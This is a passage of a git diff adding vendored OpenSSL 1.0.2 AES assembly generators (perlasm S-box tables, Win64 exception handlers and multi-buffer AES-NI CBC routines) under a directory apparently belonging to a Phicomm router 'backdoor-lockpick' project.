+	&data_byte(0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a);
+	&data_byte(0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06);
+	&data_byte(0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02);
+	&data_byte(0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b);
+	&data_byte(0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea);
+	&data_byte(0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73);
+	&data_byte(0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85);
+	&data_byte(0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e);
+	&data_byte(0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89);
+	&data_byte(0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b);
+	&data_byte(0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20);
+	&data_byte(0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4);
+	&data_byte(0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31);
+	&data_byte(0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f);
+	&data_byte(0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d);
+	&data_byte(0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef);
+	&data_byte(0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0);
+	&data_byte(0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61);
+	&data_byte(0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26);
+	&data_byte(0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d);
+$code.=<<___;
+	.long	0x80808080, 0x80808080, 0xfefefefe, 0xfefefefe
+	.long	0x1b1b1b1b, 0x1b1b1b1b, 0, 0
+.asciz  "AES for x86_64, CRYPTOGAMS by <appro\@openssl.org>"
+.align	64
+___
+
+# EXCEPTION_DISPOSITION handler (EXCEPTION_RECORD *rec,ULONG64 frame,
+#		CONTEXT *context,DISPATCHER_CONTEXT *disp)
+if ($win64) {
+$rec="%rcx";
+$frame="%rdx";
+$context="%r8";
+$disp="%r9";
+
+$code.=<<___;
+.extern	__imp_RtlVirtualUnwind
+.type	block_se_handler,\@abi-omnipotent
+.align	16
+block_se_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	mov	8($disp),%rsi		# disp->ImageBase
+	mov	56($disp),%r11		# disp->HandlerData
+
+	mov	0(%r11),%r10d		# HandlerData[0]
+	lea	(%rsi,%r10),%r10	# prologue label
+	cmp	%r10,%rbx		# context->Rip<prologue label
+	jb	.Lin_block_prologue
+
+	mov	152($context),%rax	# pull context->Rsp
+
+	mov	4(%r11),%r10d		# HandlerData[1]
+	lea	(%rsi,%r10),%r10	# epilogue label
+	cmp	%r10,%rbx		# context->Rip>=epilogue label
+	jae	.Lin_block_prologue
+
+	mov	24(%rax),%rax		# pull saved real stack pointer
+	lea	48(%rax),%rax		# adjust...
+
+	mov	-8(%rax),%rbx
+	mov	-16(%rax),%rbp
+	mov	-24(%rax),%r12
+	mov	-32(%rax),%r13
+	mov	-40(%rax),%r14
+	mov	-48(%rax),%r15
+	mov	%rbx,144($context)	# restore context->Rbx
+	mov	%rbp,160($context)	# restore context->Rbp
+	mov	%r12,216($context)	# restore context->R12
+	mov	%r13,224($context)	# restore context->R13
+	mov	%r14,232($context)	# restore context->R14
+	mov	%r15,240($context)	# restore context->R15
+
+.Lin_block_prologue:
+	mov	8(%rax),%rdi
+	mov	16(%rax),%rsi
+	mov	%rax,152($context)	# restore context->Rsp
+	mov	%rsi,168($context)	# restore context->Rsi
+	mov	%rdi,176($context)	# restore context->Rdi
+
+	jmp	.Lcommon_seh_exit
+.size	block_se_handler,.-block_se_handler
+
+.type	key_se_handler,\@abi-omnipotent
+.align	16
+key_se_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	mov	8($disp),%rsi		# disp->ImageBase
+	mov	56($disp),%r11		# disp->HandlerData
+
+	mov	0(%r11),%r10d		# HandlerData[0]
+	lea	(%rsi,%r10),%r10	# prologue label
+	cmp	%r10,%rbx		# context->Rip<prologue label
+	jb	.Lin_key_prologue
+
+	mov	152($context),%rax	# pull context->Rsp
+
+	mov	4(%r11),%r10d		# HandlerData[1]
+	lea	(%rsi,%r10),%r10	# epilogue label
+	cmp	%r10,%rbx		# context->Rip>=epilogue label
+	jae	.Lin_key_prologue
+
+	lea	56(%rax),%rax
+
+	mov	-8(%rax),%rbx
+	mov	-16(%rax),%rbp
+	mov	-24(%rax),%r12
+	mov	-32(%rax),%r13
+	mov	-40(%rax),%r14
+	mov	-48(%rax),%r15
+	mov	%rbx,144($context)	# restore context->Rbx
+	mov	%rbp,160($context)	# restore context->Rbp
+	mov	%r12,216($context)	# restore context->R12
+	mov	%r13,224($context)	# restore context->R13
+	mov	%r14,232($context)	# restore context->R14
+	mov	%r15,240($context)	# restore context->R15
+
+.Lin_key_prologue:
+	mov	8(%rax),%rdi
+	mov	16(%rax),%rsi
+	mov	%rax,152($context)	# restore context->Rsp
+	mov	%rsi,168($context)	# restore context->Rsi
+	mov	%rdi,176($context)	# restore context->Rdi
+
+	jmp	.Lcommon_seh_exit
+.size	key_se_handler,.-key_se_handler
+
+.type	cbc_se_handler,\@abi-omnipotent
+.align	16
+cbc_se_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	lea	.Lcbc_prologue(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip<.Lcbc_prologue
+	jb	.Lin_cbc_prologue
+
+	lea	.Lcbc_fast_body(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip<.Lcbc_fast_body
+	jb	.Lin_cbc_frame_setup
+
+	lea	.Lcbc_slow_prologue(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip<.Lcbc_slow_prologue
+	jb	.Lin_cbc_body
+
+	lea	.Lcbc_slow_body(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip<.Lcbc_slow_body
+	jb	.Lin_cbc_frame_setup
+
+.Lin_cbc_body:
+	mov	152($context),%rax	# pull context->Rsp
+
+	lea	.Lcbc_epilogue(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip>=.Lcbc_epilogue
+	jae	.Lin_cbc_prologue
+
+	lea	8(%rax),%rax
+
+	lea	.Lcbc_popfq(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip>=.Lcbc_popfq
+	jae	.Lin_cbc_prologue
+
+	mov	`16-8`(%rax),%rax	# biased $_rsp
+	lea	56(%rax),%rax
+
+.Lin_cbc_frame_setup:
+	mov	-16(%rax),%rbx
+	mov	-24(%rax),%rbp
+	mov	-32(%rax),%r12
+	mov	-40(%rax),%r13
+	mov	-48(%rax),%r14
+	mov	-56(%rax),%r15
+	mov	%rbx,144($context)	# restore context->Rbx
+	mov	%rbp,160($context)	# restore context->Rbp
+	mov	%r12,216($context)	# restore context->R12
+	mov	%r13,224($context)	# restore context->R13
+	mov	%r14,232($context)	# restore context->R14
+	mov	%r15,240($context)	# restore context->R15
+
+.Lin_cbc_prologue:
+	mov	8(%rax),%rdi
+	mov	16(%rax),%rsi
+	mov	%rax,152($context)	# restore context->Rsp
+	mov	%rsi,168($context)	# restore context->Rsi
+	mov	%rdi,176($context)	# restore context->Rdi
+
+.Lcommon_seh_exit:
+
+	mov	40($disp),%rdi		# disp->ContextRecord
+	mov	$context,%rsi		# context
+	mov	\$`1232/8`,%ecx		# sizeof(CONTEXT)
+	.long	0xa548f3fc		# cld; rep movsq
+
+	mov	$disp,%rsi
+	xor	%rcx,%rcx		# arg1, UNW_FLAG_NHANDLER
+	mov	8(%rsi),%rdx		# arg2, disp->ImageBase
+	mov	0(%rsi),%r8		# arg3, disp->ControlPc
+	mov	16(%rsi),%r9		# arg4, disp->FunctionEntry
+	mov	40(%rsi),%r10		# disp->ContextRecord
+	lea	56(%rsi),%r11		# &disp->HandlerData
+	lea	24(%rsi),%r12		# &disp->EstablisherFrame
+	mov	%r10,32(%rsp)		# arg5
+	mov	%r11,40(%rsp)		# arg6
+	mov	%r12,48(%rsp)		# arg7
+	mov	%rcx,56(%rsp)		# arg8, (NULL)
+	call	*__imp_RtlVirtualUnwind(%rip)
+
+	mov	\$1,%eax		# ExceptionContinueSearch
+	add	\$64,%rsp
+	popfq
+	pop	%r15
+	pop	%r14
+	pop	%r13
+	pop	%r12
+	pop	%rbp
+	pop	%rbx
+	pop	%rdi
+	pop	%rsi
+	ret
+.size	cbc_se_handler,.-cbc_se_handler
+
+.section	.pdata
+.align	4
+	.rva	.LSEH_begin_AES_encrypt
+	.rva	.LSEH_end_AES_encrypt
+	.rva	.LSEH_info_AES_encrypt
+
+	.rva	.LSEH_begin_AES_decrypt
+	.rva	.LSEH_end_AES_decrypt
+	.rva	.LSEH_info_AES_decrypt
+
+	.rva	.LSEH_begin_private_AES_set_encrypt_key
+	.rva	.LSEH_end_private_AES_set_encrypt_key
+	.rva	.LSEH_info_private_AES_set_encrypt_key
+
+	.rva	.LSEH_begin_private_AES_set_decrypt_key
+	.rva	.LSEH_end_private_AES_set_decrypt_key
+	.rva	.LSEH_info_private_AES_set_decrypt_key
+
+	.rva	.LSEH_begin_AES_cbc_encrypt
+	.rva	.LSEH_end_AES_cbc_encrypt
+	.rva	.LSEH_info_AES_cbc_encrypt
+
+.section	.xdata
+.align	8
+.LSEH_info_AES_encrypt:
+	.byte	9,0,0,0
+	.rva	block_se_handler
+	.rva	.Lenc_prologue,.Lenc_epilogue	# HandlerData[]
+.LSEH_info_AES_decrypt:
+	.byte	9,0,0,0
+	.rva	block_se_handler
+	.rva	.Ldec_prologue,.Ldec_epilogue	# HandlerData[]
+.LSEH_info_private_AES_set_encrypt_key:
+	.byte	9,0,0,0
+	.rva	key_se_handler
+	.rva	.Lenc_key_prologue,.Lenc_key_epilogue	# HandlerData[]
+.LSEH_info_private_AES_set_decrypt_key:
+	.byte	9,0,0,0
+	.rva	key_se_handler
+	.rva	.Ldec_key_prologue,.Ldec_key_epilogue	# HandlerData[]
+.LSEH_info_AES_cbc_encrypt:
+	.byte	9,0,0,0
+	.rva	cbc_se_handler
+___
+}
+
+$code =~ s/\`([^\`]*)\`/eval($1)/gem;
+
+print $code;
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aesni-mb-x86_64.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aesni-mb-x86_64.pl
new file mode 100644
index 0000000..33b1aed
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aesni-mb-x86_64.pl
@@ -0,0 +1,1395 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# Multi-buffer AES-NI procedures process several independent buffers
+# in parallel by interleaving independent instructions.
+#
+# Cycles per byte for interleave factor 4:
+#
+#			asymptotic	measured
+#			---------------------------
+# Westmere		5.00/4=1.25	5.13/4=1.28
+# Atom			15.0/4=3.75	?15.7/4=3.93
+# Sandy Bridge		5.06/4=1.27	5.18/4=1.29
+# Ivy Bridge		5.06/4=1.27	5.14/4=1.29
+# Haswell		4.44/4=1.11	4.44/4=1.11
+# Bulldozer		5.75/4=1.44	5.76/4=1.44
+#
+# Cycles per byte for interleave factor 8 (not implemented for
+# pre-AVX processors, where higher interleave factor incidentally
+# doesn't result in improvement):
+#
+#			asymptotic	measured
+#			---------------------------
+# Sandy Bridge		5.06/8=0.64	7.10/8=0.89(*)
+# Ivy Bridge		5.06/8=0.64	7.14/8=0.89(*)
+# Haswell		5.00/8=0.63	5.00/8=0.63
+# Bulldozer		5.75/8=0.72	5.77/8=0.72
+#
+# (*)	Sandy/Ivy Bridge are known to handle high interleave factors
+#	suboptimally;
+
+$flavour = shift;
+$output  = shift;
+if ($flavour =~ /\./) { $output = $flavour; undef $flavour; }
+
+$win64=0; $win64=1 if ($flavour =~ /[nm]asm|mingw64/ || $output =~ /\.asm$/);
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}x86_64-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/x86_64-xlate.pl" and -f $xlate) or
+die "can't locate x86_64-xlate.pl";
+
+$avx=0;
+
+if (`$ENV{CC} -Wa,-v -c -o /dev/null -x assembler /dev/null 2>&1`
+		=~ /GNU assembler version ([2-9]\.[0-9]+)/) {
+	$avx = ($1>=2.19) + ($1>=2.22);
+}
+
+if (!$avx && $win64 && ($flavour =~ /nasm/ || $ENV{ASM} =~ /nasm/) &&
+	   `nasm -v 2>&1` =~ /NASM version ([2-9]\.[0-9]+)/) {
+	$avx = ($1>=2.09) + ($1>=2.10);
+}
+
+if (!$avx && $win64 && ($flavour =~ /masm/ || $ENV{ASM} =~ /ml64/) &&
+	   `ml64 2>&1` =~ /Version ([0-9]+)\./) {
+	$avx = ($1>=10) + ($1>=11);
+}
+
+if (!$avx && `$ENV{CC} -v 2>&1` =~ /(^clang version|based on LLVM) ([3-9]\.[0-9]+)/) {
+	$avx = ($2>=3.0) + ($2>3.0);
+}
+
+open OUT,"| \"$^X\" $xlate $flavour $output";
+*STDOUT=*OUT;
+
+# void aesni_multi_cbc_encrypt (
+#     struct {	void *inp,*out; int blocks; double iv[2]; } inp[8];
+#     const AES_KEY *key,
+#     int num);		/* 1 or 2 */
+#
+$inp="%rdi";	# 1st arg
+$key="%rsi";	# 2nd arg
+$num="%edx";
+
+@inptr=map("%r$_",(8..11));
+@outptr=map("%r$_",(12..15));
+
+($rndkey0,$rndkey1)=("%xmm0","%xmm1");
+@out=map("%xmm$_",(2..5));
+@inp=map("%xmm$_",(6..9));
+($counters,$mask,$zero)=map("%xmm$_",(10..12));
+
+($rounds,$one,$sink,$offset)=("%eax","%ecx","%rbp","%rbx");
+
+$code.=<<___;
+.text
+
+.extern	OPENSSL_ia32cap_P
+
+.globl	aesni_multi_cbc_encrypt
+.type	aesni_multi_cbc_encrypt,\@function,3
+.align	32
+aesni_multi_cbc_encrypt:
+___
+$code.=<<___ if ($avx);
+	cmp	\$2,$num
+	jb	.Lenc_non_avx
+	mov	OPENSSL_ia32cap_P+4(%rip),%ecx
+	test	\$`1<<28`,%ecx			# AVX bit
+	jnz	_avx_cbc_enc_shortcut
+	jmp	.Lenc_non_avx
+.align	16
+.Lenc_non_avx:
+___
+$code.=<<___;
+	mov	%rsp,%rax
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+___
+$code.=<<___ if ($win64);
+	lea	-0xa8(%rsp),%rsp
+	movaps	%xmm6,(%rsp)
+	movaps	%xmm7,0x10(%rsp)
+	movaps	%xmm8,0x20(%rsp)
+	movaps	%xmm9,0x30(%rsp)
+	movaps	%xmm10,0x40(%rsp)
+	movaps	%xmm11,0x50(%rsp)
+	movaps	%xmm12,0x60(%rsp)
+	movaps	%xmm13,-0x68(%rax)	# not used, saved to share se_handler 
+	movaps	%xmm14,-0x58(%rax)
+	movaps	%xmm15,-0x48(%rax)
+___
+$code.=<<___;
+	# stack layout
+	#
+	# +0	output sink
+	# +16	input sink [original %rsp and $num]
+	# +32	counters
+
+	sub	\$48,%rsp
+	and	\$-64,%rsp
+	mov	%rax,16(%rsp)			# original %rsp
+
+.Lenc4x_body:
+	movdqu	($key),$zero			# 0-round key
+	lea	0x78($key),$key			# size optimization
+	lea	40*2($inp),$inp
+
+.Lenc4x_loop_grande:
+	mov	$num,24(%rsp)			# original $num
+	xor	$num,$num
+___
+for($i=0;$i<4;$i++) {
+    $code.=<<___;
+	mov	`40*$i+16-40*2`($inp),$one	# borrow $one for number of blocks
+	mov	`40*$i+0-40*2`($inp),@inptr[$i]
+	cmp	$num,$one
+	mov	`40*$i+8-40*2`($inp),@outptr[$i]
+	cmovg	$one,$num			# find maximum
+	test	$one,$one
+	movdqu	`40*$i+24-40*2`($inp),@out[$i]	# load IV
+	mov	$one,`32+4*$i`(%rsp)		# initialize counters
+	cmovle	%rsp,@inptr[$i]			# cancel input
+___
+}
+$code.=<<___;
+	test	$num,$num
+	jz	.Lenc4x_done
+
+	movups	0x10-0x78($key),$rndkey1
+	 pxor	$zero,@out[0]
+	movups	0x20-0x78($key),$rndkey0
+	 pxor	$zero,@out[1]
+	mov	0xf0-0x78($key),$rounds
+	 pxor	$zero,@out[2]
+	movdqu	(@inptr[0]),@inp[0]		# load inputs
+	 pxor	$zero,@out[3]
+	movdqu	(@inptr[1]),@inp[1]
+	 pxor	@inp[0],@out[0]
+	movdqu	(@inptr[2]),@inp[2]
+	 pxor	@inp[1],@out[1]
+	movdqu	(@inptr[3]),@inp[3]
+	 pxor	@inp[2],@out[2]
+	 pxor	@inp[3],@out[3]
+	movdqa	32(%rsp),$counters		# load counters
+	xor	$offset,$offset
+	jmp	.Loop_enc4x
+
+.align	32
+.Loop_enc4x:
+	add	\$16,$offset
+	lea	16(%rsp),$sink			# sink pointer
+	mov	\$1,$one			# constant of 1
+	sub	$offset,$sink
+
+	aesenc		$rndkey1,@out[0]
+	prefetcht0	31(@inptr[0],$offset)	# prefetch input
+	prefetcht0	31(@inptr[1],$offset)
+	aesenc		$rndkey1,@out[1]
+	prefetcht0	31(@inptr[2],$offset)
+	prefetcht0	31(@inptr[2],$offset)
+	aesenc		$rndkey1,@out[2]
+	aesenc		$rndkey1,@out[3]
+	movups		0x30-0x78($key),$rndkey1
+___
+for($i=0;$i<4;$i++) {
+my $rndkey = ($i&1) ? $rndkey1 : $rndkey0;
+$code.=<<___;
+	 cmp		`32+4*$i`(%rsp),$one
+	aesenc		$rndkey,@out[0]
+	aesenc		$rndkey,@out[1]
+	aesenc		$rndkey,@out[2]
+	 cmovge		$sink,@inptr[$i]	# cancel input
+	 cmovg		$sink,@outptr[$i]	# sink output
+	aesenc		$rndkey,@out[3]
+	movups		`0x40+16*$i-0x78`($key),$rndkey
+___
+}
+$code.=<<___;
+	 movdqa		$counters,$mask
+	aesenc		$rndkey0,@out[0]
+	prefetcht0	15(@outptr[0],$offset)	# prefetch output
+	prefetcht0	15(@outptr[1],$offset)
+	aesenc		$rndkey0,@out[1]
+	prefetcht0	15(@outptr[2],$offset)
+	prefetcht0	15(@outptr[3],$offset)
+	aesenc		$rndkey0,@out[2]
+	aesenc		$rndkey0,@out[3]
+	movups		0x80-0x78($key),$rndkey0
+	 pxor		$zero,$zero
+
+	aesenc		$rndkey1,@out[0]
+	 pcmpgtd	$zero,$mask
+	 movdqu		-0x78($key),$zero	# reload 0-round key
+	aesenc		$rndkey1,@out[1]
+	 paddd		$mask,$counters		# decrement counters
+	 movdqa		$counters,32(%rsp)	# update counters
+	aesenc		$rndkey1,@out[2]
+	aesenc		$rndkey1,@out[3]
+	movups		0x90-0x78($key),$rndkey1
+
+	cmp	\$11,$rounds
+
+	aesenc		$rndkey0,@out[0]
+	aesenc		$rndkey0,@out[1]
+	aesenc		$rndkey0,@out[2]
+	aesenc		$rndkey0,@out[3]
+	movups		0xa0-0x78($key),$rndkey0
+
+	jb	.Lenc4x_tail
+
+	aesenc		$rndkey1,@out[0]
+	aesenc		$rndkey1,@out[1]
+	aesenc		$rndkey1,@out[2]
+	aesenc		$rndkey1,@out[3]
+	movups		0xb0-0x78($key),$rndkey1
+
+	aesenc		$rndkey0,@out[0]
+	aesenc		$rndkey0,@out[1]
+	aesenc		$rndkey0,@out[2]
+	aesenc		$rndkey0,@out[3]
+	movups		0xc0-0x78($key),$rndkey0
+
+	je	.Lenc4x_tail
+
+	aesenc		$rndkey1,@out[0]
+	aesenc		$rndkey1,@out[1]
+	aesenc		$rndkey1,@out[2]
+	aesenc		$rndkey1,@out[3]
+	movups		0xd0-0x78($key),$rndkey1
+
+	aesenc		$rndkey0,@out[0]
+	aesenc		$rndkey0,@out[1]
+	aesenc		$rndkey0,@out[2]
+	aesenc		$rndkey0,@out[3]
+	movups		0xe0-0x78($key),$rndkey0
+	jmp	.Lenc4x_tail
+
+.align	32
+.Lenc4x_tail:
+	aesenc		$rndkey1,@out[0]
+	aesenc		$rndkey1,@out[1]
+	aesenc		$rndkey1,@out[2]
+	aesenc		$rndkey1,@out[3]
+	 movdqu		(@inptr[0],$offset),@inp[0]
+	movdqu		0x10-0x78($key),$rndkey1
+
+	aesenclast	$rndkey0,@out[0]
+	 movdqu		(@inptr[1],$offset),@inp[1]
+	 pxor		$zero,@inp[0]
+	aesenclast	$rndkey0,@out[1]
+	 movdqu		(@inptr[2],$offset),@inp[2]
+	 pxor		$zero,@inp[1]
+	aesenclast	$rndkey0,@out[2]
+	 movdqu		(@inptr[3],$offset),@inp[3]
+	 pxor		$zero,@inp[2]
+	aesenclast	$rndkey0,@out[3]
+	movdqu		0x20-0x78($key),$rndkey0
+	 pxor		$zero,@inp[3]
+
+	movups		@out[0],-16(@outptr[0],$offset)
+	 pxor		@inp[0],@out[0]
+	movups		@out[1],-16(@outptr[1],$offset)	
+	 pxor		@inp[1],@out[1]
+	movups		@out[2],-16(@outptr[2],$offset)	
+	 pxor		@inp[2],@out[2]
+	movups		@out[3],-16(@outptr[3],$offset)
+	 pxor		@inp[3],@out[3]
+
+	dec	$num
+	jnz	.Loop_enc4x
+
+	mov	16(%rsp),%rax			# original %rsp
+	mov	24(%rsp),$num
+
+	#pxor	@inp[0],@out[0]
+	#pxor	@inp[1],@out[1]
+	#movdqu	@out[0],`40*0+24-40*2`($inp)	# output iv FIX ME!
+	#pxor	@inp[2],@out[2]
+	#movdqu	@out[1],`40*1+24-40*2`($inp)
+	#pxor	@inp[3],@out[3]
+	#movdqu	@out[2],`40*2+24-40*2`($inp)	# won't fix, let caller
+	#movdqu	@out[3],`40*3+24-40*2`($inp)	# figure this out...
+
+	lea	`40*4`($inp),$inp
+	dec	$num
+	jnz	.Lenc4x_loop_grande
+
+.Lenc4x_done:
+___
+$code.=<<___ if ($win64);
+	movaps	-0xd8(%rax),%xmm6
+	movaps	-0xc8(%rax),%xmm7
+	movaps	-0xb8(%rax),%xmm8
+	movaps	-0xa8(%rax),%xmm9
+	movaps	-0x98(%rax),%xmm10
+	movaps	-0x88(%rax),%xmm11
+	movaps	-0x78(%rax),%xmm12
+	#movaps	-0x68(%rax),%xmm13
+	#movaps	-0x58(%rax),%xmm14
+	#movaps	-0x48(%rax),%xmm15
+___
+$code.=<<___;
+	mov	-48(%rax),%r15
+	mov	-40(%rax),%r14
+	mov	-32(%rax),%r13
+	mov	-24(%rax),%r12
+	mov	-16(%rax),%rbp
+	mov	-8(%rax),%rbx
+	lea	(%rax),%rsp
+.Lenc4x_epilogue:
+	ret
+.size	aesni_multi_cbc_encrypt,.-aesni_multi_cbc_encrypt
+
+.globl	aesni_multi_cbc_decrypt
+.type	aesni_multi_cbc_decrypt,\@function,3
+.align	32
+aesni_multi_cbc_decrypt:
+___
+$code.=<<___ if ($avx);
+	cmp	\$2,$num
+	jb	.Ldec_non_avx
+	mov	OPENSSL_ia32cap_P+4(%rip),%ecx
+	test	\$`1<<28`,%ecx			# AVX bit
+	jnz	_avx_cbc_dec_shortcut
+	jmp	.Ldec_non_avx
+.align	16
+.Ldec_non_avx:
+___
+$code.=<<___;
+	mov	%rsp,%rax
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+___
+$code.=<<___ if ($win64);
+	lea	-0xa8(%rsp),%rsp
+	movaps	%xmm6,(%rsp)
+	movaps	%xmm7,0x10(%rsp)
+	movaps	%xmm8,0x20(%rsp)
+	movaps	%xmm9,0x30(%rsp)
+	movaps	%xmm10,0x40(%rsp)
+	movaps	%xmm11,0x50(%rsp)
+	movaps	%xmm12,0x60(%rsp)
+	movaps	%xmm13,-0x68(%rax)	# not used, saved to share se_handler 
+	movaps	%xmm14,-0x58(%rax)
+	movaps	%xmm15,-0x48(%rax)
+___
+$code.=<<___;
+	# stack layout
+	#
+	# +0	output sink
+	# +16	input sink [original %rsp and $num]
+	# +32	counters
+
+	sub	\$48,%rsp
+	and	\$-64,%rsp
+	mov	%rax,16(%rsp)			# original %rsp
+
+.Ldec4x_body:
+	movdqu	($key),$zero			# 0-round key
+	lea	0x78($key),$key			# size optimization
+	lea	40*2($inp),$inp
+
+.Ldec4x_loop_grande:
+	mov	$num,24(%rsp)			# original $num
+	xor	$num,$num
+___
+for($i=0;$i<4;$i++) {
+    $code.=<<___;
+	mov	`40*$i+16-40*2`($inp),$one	# borrow $one for number of blocks
+	mov	`40*$i+0-40*2`($inp),@inptr[$i]
+	cmp	$num,$one
+	mov	`40*$i+8-40*2`($inp),@outptr[$i]
+	cmovg	$one,$num			# find maximum
+	test	$one,$one
+	movdqu	`40*$i+24-40*2`($inp),@inp[$i]	# load IV
+	mov	$one,`32+4*$i`(%rsp)		# initialize counters
+	cmovle	%rsp,@inptr[$i]			# cancel input
+___
+}
+$code.=<<___;
+	test	$num,$num
+	jz	.Ldec4x_done
+
+	movups	0x10-0x78($key),$rndkey1
+	movups	0x20-0x78($key),$rndkey0
+	mov	0xf0-0x78($key),$rounds
+	movdqu	(@inptr[0]),@out[0]		# load inputs
+	movdqu	(@inptr[1]),@out[1]
+	 pxor	$zero,@out[0]
+	movdqu	(@inptr[2]),@out[2]
+	 pxor	$zero,@out[1]
+	movdqu	(@inptr[3]),@out[3]
+	 pxor	$zero,@out[2]
+	 pxor	$zero,@out[3]
+	movdqa	32(%rsp),$counters		# load counters
+	xor	$offset,$offset
+	jmp	.Loop_dec4x
+
+.align	32
+.Loop_dec4x:
+	add	\$16,$offset
+	lea	16(%rsp),$sink			# sink pointer
+	mov	\$1,$one			# constant of 1
+	sub	$offset,$sink
+
+	aesdec		$rndkey1,@out[0]
+	prefetcht0	31(@inptr[0],$offset)	# prefetch input
+	prefetcht0	31(@inptr[1],$offset)
+	aesdec		$rndkey1,@out[1]
+	prefetcht0	31(@inptr[2],$offset)
+	prefetcht0	31(@inptr[3],$offset)
+	aesdec		$rndkey1,@out[2]
+	aesdec		$rndkey1,@out[3]
+	movups		0x30-0x78($key),$rndkey1
+___
+for($i=0;$i<4;$i++) {
+my $rndkey = ($i&1) ? $rndkey1 : $rndkey0;
+$code.=<<___;
+	 cmp		`32+4*$i`(%rsp),$one
+	aesdec		$rndkey,@out[0]
+	aesdec		$rndkey,@out[1]
+	aesdec		$rndkey,@out[2]
+	 cmovge		$sink,@inptr[$i]	# cancel input
+	 cmovg		$sink,@outptr[$i]	# sink output
+	aesdec		$rndkey,@out[3]
+	movups		`0x40+16*$i-0x78`($key),$rndkey
+___
+}
+$code.=<<___;
+	 movdqa		$counters,$mask
+	aesdec		$rndkey0,@out[0]
+	prefetcht0	15(@outptr[0],$offset)	# prefetch output
+	prefetcht0	15(@outptr[1],$offset)
+	aesdec		$rndkey0,@out[1]
+	prefetcht0	15(@outptr[2],$offset)
+	prefetcht0	15(@outptr[3],$offset)
+	aesdec		$rndkey0,@out[2]
+	aesdec		$rndkey0,@out[3]
+	movups		0x80-0x78($key),$rndkey0
+	 pxor		$zero,$zero
+
+	aesdec		$rndkey1,@out[0]
+	 pcmpgtd	$zero,$mask
+	 movdqu		-0x78($key),$zero	# reload 0-round key
+	aesdec		$rndkey1,@out[1]
+	 paddd		$mask,$counters		# decrement counters
+	 movdqa		$counters,32(%rsp)	# update counters
+	aesdec		$rndkey1,@out[2]
+	aesdec		$rndkey1,@out[3]
+	movups		0x90-0x78($key),$rndkey1
+
+	cmp	\$11,$rounds
+
+	aesdec		$rndkey0,@out[0]
+	aesdec		$rndkey0,@out[1]
+	aesdec		$rndkey0,@out[2]
+	aesdec		$rndkey0,@out[3]
+	movups		0xa0-0x78($key),$rndkey0
+
+	jb	.Ldec4x_tail
+
+	aesdec		$rndkey1,@out[0]
+	aesdec		$rndkey1,@out[1]
+	aesdec		$rndkey1,@out[2]
+	aesdec		$rndkey1,@out[3]
+	movups		0xb0-0x78($key),$rndkey1
+
+	aesdec		$rndkey0,@out[0]
+	aesdec		$rndkey0,@out[1]
+	aesdec		$rndkey0,@out[2]
+	aesdec		$rndkey0,@out[3]
+	movups		0xc0-0x78($key),$rndkey0
+
+	je	.Ldec4x_tail
+
+	aesdec		$rndkey1,@out[0]
+	aesdec		$rndkey1,@out[1]
+	aesdec		$rndkey1,@out[2]
+	aesdec		$rndkey1,@out[3]
+	movups		0xd0-0x78($key),$rndkey1
+
